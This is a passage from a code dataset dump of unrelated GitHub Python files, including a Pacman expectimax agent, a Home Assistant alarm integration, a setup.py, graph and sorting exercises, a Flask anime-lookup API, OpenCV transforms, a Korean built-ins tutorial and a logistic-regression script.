an opportunity\n ghostScore = 200/(1+ghostDistance)\n else:\n # Brave ghosts are scary :(\n ghostScore = -(500/(1+ghostDistance))\n\n # Calculate food score\n food = gameState.getFood()\n foodDistance = np.inf\n for x in range(food.width):\n for y in range(food.height):\n if not food[x][y]:\n continue\n d = util.manhattanDistance(pacmanPosition, (x, y))\n if d < foodDistance:\n foodDistance = d\n foodScore = 10/foodDistance\n\n return score + foodScore + ghostScore\n\n def getAction(self, gameState):\n begin_time = time.time()\n legal_moves = gameState.getLegalActions(self.index)\n max_score = -np.inf\n best_move = Directions.STOP\n for move in legal_moves:\n state = gameState.generateSuccessor(self.index, move)\n score = self._expectimax(state, self.index, self.depth)\n if score > max_score:\n max_score = score\n best_move = move\n return best_move\n\n def _expectimax(self, rootState, agentIndex, depth):\n # Handle end of game and out of depth\n legalMoves = rootState.getLegalActions(agentIndex)\n if rootState.isWin() or rootState.isLose() or not legalMoves:\n return rootState.getScore()\n if depth == 0 or time.time() - self._startTime > self._timeLimit:\n # Call heuristic if we're out of depth\n # Also skip fancy alg 
and call heuristic if we're out of time\n return self.evaluationFunction(rootState)\n\n numAgents = rootState.getNumAgents()\n # Get scores for all child states\n scores = []\n for move in legalMoves:\n nextState = rootState.generateSuccessor(agentIndex, move)\n nextAgent = (agentIndex + 1) % numAgents\n if nextAgent == 0:\n nextDepth = depth - 1\n else:\n nextDepth = depth\n score = self._expectimax(nextState, nextAgent, nextDepth)\n scores.append(score)\n # current agent is us: max layer\n if agentIndex == self.index:\n return max(scores)\n # current agnet is not us: probabilistic layer\n # RandomGhost treats all steps with equal probabily, so calc a simple average\n return np.average(scores)\n","repo_name":"hkariti/intro_ai","sub_path":"hw2/submission.py","file_name":"submission.py","file_ext":"py","file_size_in_byte":18728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"20415576645","text":"\"\"\"\nThis component provides HA alarm_control_panel support for Abode System.\n\nFor more details about this platform, please refer to the documentation at\nhttps://home-assistant.io/components/alarm_control_panel.abode/\n\"\"\"\nimport logging\n\nfrom homeassistant.components.abode import CONF_ATTRIBUTION, AbodeDevice\nfrom homeassistant.components.abode import DOMAIN as ABODE_DOMAIN\nfrom homeassistant.components.alarm_control_panel import AlarmControlPanel\nfrom homeassistant.const import (\n ATTR_ATTRIBUTION, STATE_ALARM_ARMED_AWAY, STATE_ALARM_ARMED_HOME,\n STATE_ALARM_DISARMED)\n\nDEPENDENCIES = ['abode']\n\n_LOGGER = logging.getLogger(__name__)\n\nICON = 'mdi:security'\n\n\ndef setup_platform(hass, config, add_devices, discovery_info=None):\n \"\"\"Set up an alarm control panel for an Abode device.\"\"\"\n data = hass.data[ABODE_DOMAIN]\n\n alarm_devices = [AbodeAlarm(data, data.abode.get_alarm(), data.name)]\n\n data.devices.extend(alarm_devices)\n\n add_devices(alarm_devices)\n\n\nclass AbodeAlarm(AbodeDevice, AlarmControlPanel):\n \"\"\"An alarm_control_panel implementation for Abode.\"\"\"\n\n def __init__(self, data, device, name):\n \"\"\"Initialize the alarm control panel.\"\"\"\n super().__init__(data, device)\n self._name = name\n\n @property\n def icon(self):\n \"\"\"Return the icon.\"\"\"\n return ICON\n\n @property\n def state(self):\n \"\"\"Return the state of the device.\"\"\"\n if self._device.is_standby:\n state = STATE_ALARM_DISARMED\n elif self._device.is_away:\n state = STATE_ALARM_ARMED_AWAY\n elif self._device.is_home:\n state = STATE_ALARM_ARMED_HOME\n else:\n state = None\n return state\n\n def alarm_disarm(self, code=None):\n \"\"\"Send disarm command.\"\"\"\n self._device.set_standby()\n\n def alarm_arm_home(self, code=None):\n \"\"\"Send arm home command.\"\"\"\n self._device.set_home()\n\n def alarm_arm_away(self, code=None):\n \"\"\"Send arm away command.\"\"\"\n self._device.set_away()\n\n @property\n def name(self):\n \"\"\"Return the name of the alarm.\"\"\"\n return self._name or super().name\n\n @property\n def device_state_attributes(self):\n \"\"\"Return the state attributes.\"\"\"\n return {\n ATTR_ATTRIBUTION: CONF_ATTRIBUTION,\n 'device_id': self._device.device_id,\n 'battery_backup': self._device.battery,\n 'cellular_backup': self._device.is_cellular,\n 
}\n","repo_name":"jest-community/jest-pytest","sub_path":"src/__tests__/integration/home-assistant/homeassistant/components/alarm_control_panel/abode.py","file_name":"abode.py","file_ext":"py","file_size_in_byte":2497,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"75"} +{"seq_id":"29406734932","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport importlib\nimport sys\nimport os\n\nfrom typing import Dict\n\nfrom setuptools import setup\n\nhere = os.path.abspath(os.path.dirname(__file__))\n\n# To update the package version number, edit data-CAT/__version__.py\nversion: Dict[str, str] = {}\nversion_path = os.path.join(here, 'dataCAT', '__version__.py')\nwith open(version_path, encoding='utf-8') as f:\n exec(f.read(), version)\n\nwith open('README.rst', encoding='utf-8') as readme_file:\n readme = readme_file.read()\n\nbuild_require = [\n 'twine',\n 'wheel'\n]\n\ntests_require = [\n 'pytest>=5.4.0',\n 'pytest-cov',\n 'nlesc-CAT>=0.10.1',\n]\ntests_require += build_require\n\n# Check if rdkit is manually installed (as it is not available via pypi)\ntry:\n importlib.import_module(\"rdkit\")\nexcept ModuleNotFoundError:\n print(\n \"`Nano-CAT` requires the `rdkit` package: https://anaconda.org/conda-forge/rdkit\",\n file=sys.stderr,\n )\n\nsetup(\n name='Data-CAT',\n version=version['__version__'],\n description='A databasing framework for the Compound Attachment Tools package (CAT).',\n long_description=f'{readme}\\n\\n',\n author=['B. F. van Beek'],\n author_email='b.f.van.beek@vu.nl',\n url='https://github.com/nlesc-nano/data-CAT',\n packages=[\n 'dataCAT',\n 'dataCAT.data'\n ],\n package_dir={'dataCAT': 'dataCAT'},\n include_package_data=True,\n license='GNU Lesser General Public License v3 or later',\n zip_safe=False,\n keywords=[\n 'database',\n 'science',\n 'chemistry',\n 'python-3',\n 'python-3-7',\n 'python-3-8',\n 'python-3-9',\n 'python-3-10',\n 'automation'\n ],\n package_data={\n 'dataCAT': [\n 'py.typed',\n '*.pyi',\n 'data/*.pdb'\n ]\n },\n classifiers=[\n 'Development Status :: 3 - Alpha',\n 'Intended Audience :: Science/Research',\n 'License :: OSI Approved :: GNU General Public License v3 or later (GPLv3+)',\n 'Natural Language :: English',\n 'Operating System :: Unix',\n 'Operating System :: MacOS',\n 'Programming Language :: Python :: 3.7',\n 'Programming Language :: Python :: 3.8',\n 'Programming Language :: Python :: 3.9',\n 'Programming Language :: Python :: 3.10',\n 'Topic :: Database',\n 'Typing :: Typed'\n ],\n test_suite='tests',\n python_requires='>=3.7',\n install_requires=[\n 'h5py>=3.0.0',\n 'numpy',\n 'pandas',\n 'pymongo',\n 'Nano-Utils>=2.3.1',\n 'AssertionLib>=2.2.0',\n 'plams>=1.5.1',\n 'nlesc-CAT>=0.10.0',\n ],\n tests_require=tests_require,\n extras_require={\n 'test': tests_require,\n 'build': build_require\n }\n)\n","repo_name":"nlesc-nano/data-CAT","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"29971035139","text":"# We have a layout of dominoes. We have it as a list of pairs [a, b]. If we knock over block a, block\n# b will also fall over. 
Find the minimum number of blocks that need to be knocked over by hand so that\n# all dominoes are downed.\n\n\ndef DFSUtil(graph, source, visited, stack):\n visited[source] = True\n for v in graph[source]:\n if not visited[v]:\n DFSUtil(graph, v, visited, stack)\n stack.append(source)\n\n\ndef dfs(graph, source, visited, scc, index):\n visited[source] = True\n scc[index].append(source)\n for v in graph[source]:\n if not visited[v]:\n dfs(graph, v, visited, scc, index)\n\n\ndef DFS(graph, source, visited):\n visited[source] = True\n for v in graph[source]:\n if not visited[v]:\n DFS(graph, v, visited)\n\n\ndef transpose_graph(graph, new_graph):\n for i in range(len(graph)):\n for j in range(len(graph[i])):\n new_graph[graph[i][j]].append(i)\n\n\ndef domino(graph, source):\n max_vertex = 0\n for i in range(len(graph)):\n max_vertex = max(max_vertex, max(graph[i]))\n new_graph = [[] for _ in range(max_vertex + 1)]\n for i in range(len(graph)):\n new_graph[graph[i][0]].append(graph[i][1])\n visited = [False] * len(new_graph)\n stack = []\n for i in range(len(new_graph)):\n if not visited[i]:\n DFSUtil(new_graph, i, visited, stack)\n modified_graph = [[] for _ in range(len(new_graph))]\n transpose_graph(new_graph, modified_graph)\n for i in range(len(new_graph)):\n visited[i] = False\n index = 0\n scc = [[] for _ in range(max_vertex)]\n while len(stack):\n u = stack.pop()\n if not visited[u]:\n dfs(modified_graph, u, visited, scc, index)\n index += 1\n i = 0\n while i < len(scc):\n if len(scc[i]) == 0:\n del (scc[i])\n else:\n i += 1\n for i in range(len(scc)):\n if len(scc[i]) > 1:\n for j in range(len(graph)):\n if graph[j][0] in scc[i]:\n graph[j][0] = scc[i][0]\n if graph[j][1] in scc[i]:\n graph[j][1] = scc[i][0]\n i = 0\n while i < len(graph):\n if graph[i][0] == graph[i][1]:\n graph.remove(graph[i])\n else:\n i += 1\n for i in range(len(graph)):\n for j in range(len(scc)):\n if graph[i][0] in scc[j]:\n graph[i][0] = j\n break\n for i in range(len(graph)):\n for j in range(len(scc)):\n if graph[i][1] in scc[j]:\n graph[i][1] = j\n break\n max_vertex = 0\n for i in range(len(graph)):\n max_vertex = max(max_vertex, max(graph[i]))\n last_graph = [[] for _ in range(max_vertex + 1)]\n for i in range(len(graph)):\n last_graph[graph[i][0]].append(graph[i][1])\n visit = [False] * (max_vertex + 1)\n count = 0\n for i in range(len(graph)):\n if not visit[i]:\n count += 1\n DFS(last_graph, i, visit)\n return count\n\n\ngraph = [[0, 1], [1, 2], [2, 3], [3, 1], [3, 5], [4, 2], [5, 6], [6, 7], [7, 8], [8, 9], [9, 6]]\nprint(domino(graph, 0))\n","repo_name":"Szymon-Budziak/Algorithms_and_Data_Structures_course_AGH","sub_path":"Graph algorithms/19_domino.py","file_name":"19_domino.py","file_ext":"py","file_size_in_byte":3161,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"75"} +{"seq_id":"70467647921","text":"import argparse\n# https://docs.python.org/zh-cn/3.7/library/argparse.html#module-argparse\n# u:python argparse_1.py -o hhh\n## 文件名不能和包名argparse相同argparse.py\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('-o', '--output')\n parser.add_argument('-v', dest='verbose', action='store_true')\n args = parser.parse_args()\n print(args.output)\n # ... do something with args.output ...\n # ... 
do something with args.verbose ..","repo_name":"kingreatwill/penter","sub_path":"study/cli_argparse_1.py","file_name":"cli_argparse_1.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"75"} +{"seq_id":"41742501966","text":"import sys\n\nclass Generator():\n def __init__(self, factor, start):\n self.factor = factor\n self.value = start\n\n def next(self):\n self.value = self.factor*self.value%2147483647\n return self.value\n\nclass SafeGenerator():\n def __init__(self, base, factor, start):\n self.base = base\n self.factor = factor\n self.value = start\n\n def next(self):\n self.value = self.factor*self.value%2147483647\n while(self.value % self.base != 0):\n self.value = self.factor*self.value%2147483647\n return self.value\n\n\n\ndef run(start_a, start_b, iters):\n count = 0\n gen_a = SafeGenerator(4,16807, start_a)\n gen_b = SafeGenerator(8,48271, start_b)\n for i in range(iters):\n a = gen_a.next()\n b = gen_b.next()\n if(((a ^ b) & 65535) == 0):\n count+=1\n return count\n\nif __name__ == '__main__':\n print(run(512, 191, 5000000))","repo_name":"neilb14/advent-of-code","sub_path":"day15/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"3603794872","text":"from flask import Blueprint, jsonify, abort, make_response, request\nfrom flask_cors import CORS\nfrom common.anime import Anime\nimport requests\n\napi = Blueprint('kitsu', __name__, url_prefix='/kitsu')\ncors = CORS(api, origins='https://www.cs.drexel.edu')\n\nsession = requests.Session()\nsession.headers = {\n 'Accept': 'application/vnd.api+json',\n 'Content-Type': 'application/vnd.api+json'\n}\n\n\n@api.route('/', methods=['GET'])\ndef get_recomendation_bytitle(title):\n response = session.get('https://kitsu.io/api/edge/anime?filter[text]=' + title, timeout=4)\n response.raise_for_status()\n\n result = parse(response.json()['data'])\n\n if result:\n return jsonify({'anime': result.toDict()})\n abort(404)\n\n\ndef parse(response):\n anime = response[0]\n\n title_romaji = get_title_by_language_codes(\n anime['attributes']['titles'],\n ['en_jp']\n )\n title_english = get_title_by_language_codes(\n anime['attributes']['titles'],\n ['en', 'en_us']\n )\n title_japanese = get_title_by_language_codes(\n anime['attributes']['titles'],\n ['ja_jp']\n )\n\n rating = anime['attributes']['averageRating']\n\n description = anime['attributes']['synopsis']\n\n return Anime(\n title_english,\n title_romaji,\n title_japanese,\n description,\n rating,\n None,\n None,\n None\n )\n\n\ndef get_title_by_language_codes(titles, codes):\n for language_code in codes:\n if language_code in titles:\n return titles[language_code]\n return None","repo_name":"bug-sam/animewebapi","sub_path":"controllers/kitsuController.py","file_name":"kitsuController.py","file_ext":"py","file_size_in_byte":1574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"5820702030","text":"import re\ndef existwhen(data):\n \"\"\"\n Taking the whole data from exit when to not found. 
and replacing the data between them as empty\n Example :: exit when the varchar has features not found ==> exit when not found --Lakshmi 7/14\n \"\"\"\n data = data\n find_data = re.findall(r'\\bexit when\\b(.*?)\\bnotfound', data, re.DOTALL)\n if len(find_data):\n for i in find_data:\n data = data.replace(i, ' ')\n else:\n data = data\n\n return data\n","repo_name":"sivanagarajumolabant/CookBookApp","sub_path":"backend/Modules/existwhen.py","file_name":"existwhen.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"73309099442","text":"import numpy as np\r\nimport cv2 as cv\r\nimport matplotlib.pyplot as plt\r\n\r\nimg = cv.imread('chess.png')\r\nrows,cols,ch = img.shape\r\n\r\n#Affine Transformation\r\npts1 = np.float32([[50,50],[200,50],[50,200]])\r\npts2 = np.float32([[10,100],[200,50],[100,250]])\r\nM = cv.getAffineTransform(pts1,pts2)\r\ndst = cv.warpAffine(img,M,(cols,rows))\r\nplt.subplot(121),plt.imshow(img),plt.title('Original')\r\nplt.subplot(122),plt.imshow(dst),plt.title('Affine')\r\nplt.show()\r\n\r\n#Perspective Transformation\r\npts1 = np.float32([[56,65],[368,52],[28,387],[389,390]])\r\npts2 = np.float32([[0,0],[300,0],[0,300],[300,300]])\r\nM = cv.getPerspectiveTransform(pts1,pts2)\r\ndst = cv.warpPerspective(img,M,(300,300))\r\nplt.subplot(121),plt.imshow(img),plt.title('Original')\r\nplt.subplot(122),plt.imshow(dst),plt.title('Perspective')\r\nplt.show()\r\n","repo_name":"jerald1608/computer_vision","sub_path":"ex7/ex7.py","file_name":"ex7.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"7377679258","text":"\r\n# 내장함수\r\n\r\n# abs : 절대값을 돌려주는 함수\r\nabs(3) # 3\r\nabs(-3) # 3\r\n\r\n# all(x) : x가 모두 참이면 True, 거짓이 하나라도 있으면 False\r\nall([1,2,3]) # True\r\nall(([1,2,3,0])) # False\r\n\r\n# any(x) : x중 하나라도 참이면 True, 모두 거짓이면 False\r\nany([1,2,3,0]) # True\r\nany([0,\"\"]) # False\r\n\r\n# chr : 아스키코드 문자를 출력\r\nchr(97) # 'a'\r\nchr(48) # '0'\r\n\r\n# dir : 내장 변수나 함수를 보여준다\r\ndir([1,2,3])\r\ndir()\r\n\r\n# divmod(a,b) : a / b 로 나눈 몫과 나머지를 튜플형으로 반환\r\ndivmod(7,3) # (2,1) 몫은 2, 나머지는 3\r\n\r\n# enumerate : 열거형, 순서가 있는 자료형을 입력받아 인덱스값을 포함하는 enumerate객체를 돌려준다\r\nfor i, name, in enumerate(['body', 'foo', 'bar']):\r\n print(i, name)\r\n'''\r\n0 body\r\n1 foo\r\n2 bar\r\n'''\r\n\r\n# eval(expressioin) : 실행 가능한 문자열을 입력받아 실행결과 값 반환\r\neval('1+2') # 3\r\neval(\"'hi' + 'a'\") # 'hia'\r\neval('divmod(4,3)') # (1, 1)\r\n\r\n# filter\r\ndef positive(l):\r\n result = []\r\n for i in l:\r\n if i > 0:\r\n result.append(i)\r\n return result\r\nprint(positive([1,-3,2,0,-5,6])) # [1, 2, 6]\r\n\r\n# 위으 ㅣ코드를 더 간단하게 : lambda\r\nlist(filter(lambda x: x>0,[1,-3,2,0,-5,6])) # [1, 2, 6]\r\n\r\n# hex(x) : 16진수로 반환\r\nhex(234) # '0xea'\r\n\r\n# id : 객체의 고유주소 값 반환\r\na = 3\r\nid(3) # 8791332659664\r\nid(a) # 8791332659664\r\n\r\n# input() : 콘솔 입력값 받기\r\n\r\n# int() : 정수로 캐스팅\r\n# int('값',진수) : 진수 ==> 10진수로\r\nint('11',2) # 3\r\nint('1A',16) # 26\r\n\r\n# isinstance(객체,클래스) : 인스턴스가 해당 클래스의 인스턴스인지 판단, 참일경우 True\r\nclass Person:\r\n pass # 내용이 없는 클래스입니다\r\n\r\na = Person() # 인스턴스 생성\r\nb = 3\r\nisinstance(a,Person) # a가 Person클래스의 인스턴스인지 확인 : True\r\nisinstance(b,Person) # False\r\n\r\n# len(s) : s의 길이의 갯수 반환\r\nlen(\"python\") # 6\r\nlen([1,2,3]) # 3\r\n\r\n# list(s) : s를 입력받아 리스트로 만들어 반환\r\nlist(\"pyrhon\") # ['p', 'y', 'r', 'h', 'o', 'n']\r\n\r\n# map(함수, 반복자료) : 자료의 갯수만큼 함수 실행 후 그 결과를 묶어서 반환\r\n# 본래 
코드\r\ndef two_times(numberList):\r\n result = []\r\n for number in numberList:\r\n result.append(number*2)\r\n return result\r\n\r\nresult = two_times([1,2,3,4])\r\nprint(result) # [2, 4, 6, 8]\r\n# map함수 이용\r\ndef two_times(x): return x*2\r\nlist(map(two_times, [1,2,3,4])) # [2, 4, 6, 8]\r\n# map과 lambda함수 이용\r\nlist(map(lambda a: a*2, [1,2,3,4])) # [2, 4, 6, 8]\r\n\r\n# max() : 최댓값\r\nmax([1,2,3]) # 3\r\n\r\n# min() : 최솟값\r\nmin([1,2,3]) # 1\r\n\r\n# oct() : 8진수 반환\r\noct(34) # '0o42'\r\noct(12345) # '0o30071'\r\n\r\n# open(파일이름, [읽기방법]) : 파일객체 반환 / 읽기방법 생략 시 기본값 r\r\n\r\n# ord(c) : 문자의 아스키코드 값 반환\r\nord('a') # 97\r\nord('0') # 48\r\n\r\n# pow(x,y) : x의 y제곱 결과 값 반환\r\npow(2,4) # 16\r\n\r\n# range([start],stop,[step]) :\r\nlist(range(5)) # [0, 1, 2, 3, 4]\r\nlist(range(5,10)) # [5, 6, 7, 8, 9]\r\nlist(range(1,10,2)) # [1, 3, 5, 7, 9]\r\n\r\n# round(숫자,[소수점자리]) : 반올림\r\nround(4.6) # 5\r\nround(5.678,2) # 5.68\r\n\r\n# sorted() : 입력값을 정렬 후 리스트 형태로 반환\r\nsorted([3,1,2]) # [1, 2, 3]\r\nsorted(['a','c','b']) # ['a', 'b', 'c']\r\nsorted(\"zero\") # ['e', 'o', 'r', 'z']\r\nsorted((3,2,1)) # [1, 2, 3]\r\n\r\n# str() : 문자열로 반환\r\nstr(3) # '3'\r\nstr('hi'.upper()) # 'HI'\r\n\r\n# sum() : 입력받은 리스트나, 튜플의 모든 요소의 합 반환\r\nsum([1,2,3]) # 6\r\nsum((4,5,6)) # 15\r\n\r\n# tuple() : 튜플형태로 반환\r\ntuple(\"abc\") # ('a', 'b', 'c')\r\ntuple([1,2,3]) # (1, 2, 3)\r\n\r\n# type() : 입력값의 자료형 반환\r\ntype(\"abc\") # \r\ntype([]) # \r\n\r\n# zip() : 동일한 개수로 이루어진 자료형을 묶어주는 역할\r\nlist(zip([1,2,3], [4,5,6])) # [(1, 4), (2, 5), (3, 6)]\r\nlist(zip([1,2,3], [4,5,6], [7,8,9])) # [(1, 4, 7), (2, 5, 8), (3, 6, 9)]\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"heeji1996/Python","sub_path":"내장함수.py","file_name":"내장함수.py","file_ext":"py","file_size_in_byte":4116,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"4730334668","text":"#Multilevel - class C inherits class B, class B inherits class A --> One child inherits another child, and another child inherits parent\n#we can create any number of levels\n\nclass A:\n a,b = 10,20\n def add(self):\n print(self.a+self.b)\n\nclass B(A):\n x,y = 100,200\n def mul(self):\n print(self.x*self.y)\n\nclass C(B):\n i,j=10,2\n def div(self):\n print(self.i/self.j)\n\nc = C()\nc.add()\nc.mul()\nc.div()","repo_name":"shreyassk18/MyPyCharmProject","sub_path":"OOPs_concept/Inheritance/Multilevel_inheritance.py","file_name":"Multilevel_inheritance.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"17092025152","text":"from typing import List\n\nclass Solution:\n def filterRestaurants(self, restaurants: List[List[int]], veganFriendly: int, maxPrice: int, maxDistance: int) -> List[int]:\n r1 = [[x[0],x[1]] for x in restaurants if (veganFriendly & x[2] == veganFriendly) and x[3] <= maxPrice and x[4] <= maxDistance ]\n r2 = sorted(r1,key=lambda x:(x[1],x[0]),reverse=True)\n r3 = map(lambda x:x[0],r2)\n return list(r3)\n\ns = Solution()\n\nrestaurants = [[1,4,1,40,10],[2,8,0,50,5],[3,8,1,30,4],[4,10,0,10,3],[5,1,1,15,1]]\nveganFriendly = 1\nmaxPrice = 50\nmaxDistance = 10\n\nprint(s.filterRestaurants(restaurants,veganFriendly,maxPrice,maxDistance))","repo_name":"zhroot/leetcode","sub_path":"1333.py","file_name":"1333.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"29980893989","text":"# NOTE: Much of the 
following code has been taken from the website\r\n# https://www.datacamp.com/community/tutorials/understanding-logistic-regression-python\r\n\r\nimport os.path\r\nimport pandas\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.linear_model import LogisticRegression\r\nfrom sklearn import metrics\r\nimport numpy\r\nimport matplotlib.pyplot as plt\r\nimport seaborn\r\n\r\nif not os.path.exists(\"Surgical-deepnet.csv\"):\r\n print(\"Please place Surgical-deepnet.csv in the same directory as this program and then re-run the file.\")\r\nelse:\r\n # load data from CSV file\r\n print(\"Loading data from CSV file...\")\r\n ColNames = ['bmi', 'Age', 'asa_status', 'baseline_cancer', 'baseline_charlson', 'baseline_cvd',\r\n 'baseline_dementia', 'baseline_diabetes', 'baseline_digestive', 'baseline_osteoart', 'baseline_psych',\r\n 'baseline_pulmonary', 'ahrq_ccs', 'ccsComplicationRate', 'ccsMort30Rate', 'complication_rsi', 'dow',\r\n 'gender', 'hour', 'month', 'moonphase', 'mort30', 'mortality_rsi', 'race', 'complication',\r\n 'complication_or_mort30']\r\n File = pandas.read_csv(\"Surgical-deepnet.csv\", header=None, names=ColNames)\r\n File.head()\r\n\r\n print(\"Choose your inputs\\n(1) Raw inputs\\n(2) All inputs\")\r\n while True:\r\n ChooseInput = input(\"Enter: \")\r\n try:\r\n ChooseInput = int(ChooseInput)\r\n if ChooseInput == 1:\r\n FeatureCols = ['bmi', 'Age', 'baseline_cancer', 'baseline_cvd', 'baseline_dementia',\r\n 'baseline_diabetes', 'baseline_digestive', 'baseline_osteoart', 'baseline_psych',\r\n 'baseline_pulmonary', 'gender', 'race', 'dow', 'hour', 'month', 'moonphase']\r\n break\r\n elif ChooseInput == 2:\r\n FeatureCols = ['bmi', 'Age', 'baseline_cancer', 'baseline_charlson', 'baseline_cvd',\r\n 'baseline_dementia', 'baseline_diabetes', 'baseline_digestive', 'baseline_osteoart',\r\n 'baseline_psych',\r\n 'baseline_pulmonary', 'ahrq_ccs', 'ccsComplicationRate', 'ccsMort30Rate',\r\n 'complication_rsi', 'dow',\r\n 'gender', 'hour', 'month', 'moonphase', 'mortality_rsi', 'race']\r\n break\r\n else:\r\n print(\"Invalid input.\")\r\n except ValueError:\r\n print(\"Invalid input.\")\r\n\r\n Features = File[FeatureCols] # actual feature data\r\n TargetVariable = File.complication_or_mort30 # label (target variable)\r\n print(\"Done.\\n\")\r\n\r\n print(\"Training logistic model...\")\r\n # splits data into training (90%) and testing (10%)\r\n TrainFeatures, TestFeatures, TrainLabels, TestLabels = train_test_split(Features, TargetVariable, test_size=0.1, random_state=1)\r\n Batches = 50 # splits data into equal pieces\r\n Epochs = 20 # runs data through the model 20 times\r\n ListTrainFeatures = numpy.array_split(TrainFeatures, Batches) # splits the data into 100 batches\r\n ListTrainLabels = numpy.array_split(TrainLabels, Batches)\r\n LogReg = LogisticRegression(max_iter=700, warm_start=True, random_state=1)\r\n print(\"0 %\")\r\n for a in range(Epochs):\r\n for b in range(Batches):\r\n LogReg.fit(ListTrainFeatures[b], ListTrainLabels[b]) # trains model\r\n print(round(((a + 1) / Epochs * 100), 1), \"%\")\r\n print(\"Done.\")\r\n\r\n # displays training\r\n LabelPrediction = LogReg.predict(TestFeatures)\r\n print(\"Accuracy:\", metrics.accuracy_score(TestLabels, LabelPrediction))\r\n print(\"Precision:\", metrics.precision_score(TestLabels, LabelPrediction))\r\n print(\"Recall:\", metrics.recall_score(TestLabels, LabelPrediction))\r\n\r\n ConfusionMatrix = metrics.confusion_matrix(TestLabels, LabelPrediction)\r\n Classes = [\"No complication\", \"Complication\"] # 
have complication or not\r\n fig, ax = plt.subplots()\r\n tick_marks = numpy.arange(len(Classes))\r\n plt.xticks(tick_marks, Classes)\r\n plt.yticks(tick_marks, Classes)\r\n\r\n # create confusion matrix heatmap\r\n seaborn.heatmap(pandas.DataFrame(ConfusionMatrix), annot=True, cmap=\"YlGnBu\", fmt='g')\r\n ax.xaxis.set_label_position(\"top\")\r\n plt.tight_layout()\r\n plt.title('Confusion matrix', y=1.1)\r\n plt.ylabel('Actual outcome')\r\n plt.xlabel('Predicted outcome')\r\n plt.show()\r\n\r\n # evaluate performance\r\n y_pred_proba = LogReg.predict_proba(TestFeatures)[::, 1]\r\n fpr, tpr, _ = metrics.roc_curve(TestLabels, y_pred_proba)\r\n auc = metrics.roc_auc_score(TestLabels, y_pred_proba)\r\n plt.plot(fpr, tpr, label=\"Data, AUC Score=\" + str(auc))\r\n plt.legend(loc=4)\r\n plt.show()\r\n","repo_name":"MonsieurLundi/Logistic-Regression","sub_path":"Machine Learning Complication Predictor.py","file_name":"Machine Learning Complication Predictor.py","file_ext":"py","file_size_in_byte":4740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"21272785569","text":"\r\nfrom sorting.algorithms.algorithm import Algorithm\r\nfrom sorting.sorting import Sorting\r\n\r\n\r\nclass Student:\r\n '''\r\n Represents an entity student:\r\n -studentID - unique ID\r\n -name - name of the student\r\n '''\r\n \r\n def __init__(self, studentID, studentName):\r\n self.__studentID = studentID\r\n self.__studentName = studentName\r\n \r\n\r\n def student_less_than(self, other):\r\n \"\"\"name ascending, age descending\r\n \"\"\"\r\n if self.studentName == other.studentName:\r\n return self.studentID > other.studentID\r\n return self.studentName < other.studentName\r\n \r\n \r\n def __lt__(self, other):\r\n return self.student_less_than(other)\r\n def __gt__(self):\r\n return lambda x, y: not self.student_less_than(x, y)\r\n \r\n def __str__(self):\r\n '''\r\n This function represents the student\r\n ''' \r\n \r\n return 'StudentID: {0} StudentName: {1}'.format(self.__studentID, self.__studentName)\r\n \r\n @property\r\n def studentID(self):\r\n '''\r\n Getter for the id of the student\r\n :return: an integer representing the id of the student\r\n '''\r\n return self.__studentID\r\n \r\n @studentID.setter\r\n def studentID(self,newID):\r\n '''\r\n Setter for the student Id\r\n :parameter: the new Id \r\n '''\r\n self.__studentID = newID\r\n \r\n @studentID.deleter\r\n def studentID(self):\r\n del self.__studentID\r\n \r\n @property\r\n def studentName(self):\r\n '''\r\n Getter for the Name of the student\r\n :return: a string: the name of the student\r\n '''\r\n return self.__studentName \r\n \r\n @studentName.setter \r\n def studentName(self,newName):\r\n '''\r\n Setter for the student name\r\n :parameter: the new name\r\n '''\r\n self.__studentName = newName\r\n \r\n @studentName.deleter\r\n def studentName(self):\r\n del self.__studentName\r\n\r\n\r\nif __name__ == '__main__':\r\n l = [2, 1, 3]\r\n Sorting.sort(l)\r\n assert (l == [1, 2, 3])\r\n\r\n l = [2, 1, 4,3,-1]\r\n Sorting.sort(l)\r\n assert (l == [-1,1,2,3,4])\r\n \r\n l=[-3,4,0,-1]\r\n Sorting.sort(l)\r\n assert(l==[-3,-1,0,4])\r\n \r\n \r\n st1=Student(3,\"Mary\")\r\n st2=Student(1,\"Anne\")\r\n st3=Student(2,\"Eric\")\r\n st4=Student(4,\"Christian\")\r\n \r\n \r\n l=[st1,st2,st3,st4]\r\n Sorting.sort(l, key=lambda x: x.studentID)\r\n assert(l==[st2,st3,st1,st4])\r\n \r\n l=[st1,st2,st3,st4]\r\n Sorting.sort(l, key=lambda x: x.studentID,reverse=True)\r\n assert(l==[st4,st1,st3,st2])\r\n 
